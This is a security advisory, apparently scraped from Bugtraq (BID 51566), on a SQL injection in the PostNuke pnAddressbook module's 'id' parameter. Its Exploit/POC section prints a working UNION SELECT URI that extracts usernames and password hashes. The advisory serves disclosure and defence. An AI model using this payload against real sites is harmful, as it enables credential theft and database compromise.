PostNuke pnAddressbook Module 'id' Parameter SQL Injection Vulnerability
BID:51566
Info
PostNuke pnAddressbook Module 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 51566 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 19 2012 12:00AM |
| Updated: | Jan 19 2012 12:00AM |
| Credit: | Robert Cooper |
| Vulnerable: |
PostNuke pnAddressbook 0 |
| Not Vulnerable: | |
Discussion
PostNuke pnAddressbook Module 'id' Parameter SQL Injection Vulnerability
The pnAddressbook module for PostNuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database
The pnAddressbook module for PostNuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database
Exploit / POC
PostNuke pnAddressbook Module 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass)
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass)
Solution / Fix
PostNuke pnAddressbook Module 'id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PostNuke pnAddressbook Module 'id' Parameter SQL Injection Vulnerability
References:
References:
- PostNuke Homepage (PostNuke Development Team)